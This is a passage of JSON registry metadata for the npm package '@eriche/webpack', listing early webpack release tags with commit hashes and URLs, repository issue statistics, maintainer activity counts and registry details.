","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-28T06:19:27.561Z","dependent_packages_count":0,"downloads":11,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":21.667234888816285,"dependent_packages_count":31.229268419277904,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":26.448251654047095},"purl":"pkg:npm/%40eriche/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@eriche/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@eriche/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@eriche/webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T00:11:08.805Z","issues_count":10164,"pull_requests_count":9440,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2773483.7856259136,"issues_closed_count":9898,"pull_requests_closed_count":8891,"pull_request_authors_count":1445,"issue_authors_count":6685,"avg_comments_per_issue":5.83530106257379,"avg_comments_per_pull_request":3.1801906779661016,"merged_pull_requests_count":6026,"bot_issues_count":8,"bot_pull_requests_count":2913,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":363637.6099865047,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":741,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4375,"past_year_avg_comments_per_pull_request":4.864893617021276,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":586,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1081,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":439,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@eriche%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@eriche%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@eriche%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@eriche%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@eriche%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@eriche%2Fwebpack/codemeta","maintainers":[{"uuid":"eriche","login":"eriche","name":null,"email":"eriche56@outlook.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~eriche","role":null,"created_at":"2026-05-19T23:02:26.966Z","updated_at":"2026-05-19T23:02:26.966Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/eriche/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"